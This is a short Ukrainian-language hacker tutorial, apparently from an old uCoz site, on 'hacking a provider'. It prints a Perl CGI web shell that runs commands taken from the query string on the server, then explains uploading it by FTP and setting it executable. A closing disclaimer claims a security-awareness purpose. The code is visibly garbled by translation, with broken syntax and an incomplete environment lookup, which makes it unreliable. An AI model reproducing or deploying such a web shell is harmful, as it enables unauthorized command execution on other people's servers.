Злом провайдера
Тобі потрібно написати perl-скрипт для управління серваке твого провайдера (мається на увазі, що в якості www-сервера у твого прова встановлений Apacheperl: найбільш популярний варіант). Не бійся, написати його дуже просто. Окривают блокнот aka notepad.exe :) і набивай туди текст:
#! / Usr / bin / perl
print "Content-type: text / htmlnn";
$ Cmd = $ ENV; # Надаємо змінної "cmd" аргументам скрипта.
@ Tmp = split (/% 20 /, $ cmd); # Заводимо масив "tmp" в якому зберігаються розбиті по прогалин рядки з змінної "cmd".
$ Cmd = join ( "", @ tmp); # Оновлюємо змінну "cmd", замінюючи все закодовані оглядачем прогалини (% 20) на звичайні.
@ Output = `$ cmd`; # Виконуємо команду "cmd" на сервері і записуємо її результат в масив "output".
print "
n ";
foreach (@output) print "$ _"; # Виводимо результат на екран.
>Збережи це чудо під ім'ям "test.pl" і залий його на сервер в в ascii-режимі (інакше нічого працювати не буде). Щоб перейти до ascii-режиму, відправляй команду Ftp-сервера: "TYPE A".
Все просто. Скрипт виконують команду, яка передається через QUERY_STRING. Але, перед тим як протестувати скрипт, потрібно зробити його виконуваним. Для цього поміняй його атрибути на "755" (якщо не можеш знайти, де змінити їх, відправ команду "site chmod 755 test.pl" на Ftp-сервер.
ВHІМАHІЕ. . Мета цієї замітки - показати провайдера можливі недоліки їх систем безпеки і пpівлечь їх увагу до пpоблеме несанкціоніpованного доступу. Автоp не несе відповідальності за можливі наслідки, викликані твоpческом осмисленням даного матеpиала Новомосковсктелямі.
Сайт створено в системі uCoz
Схожі статті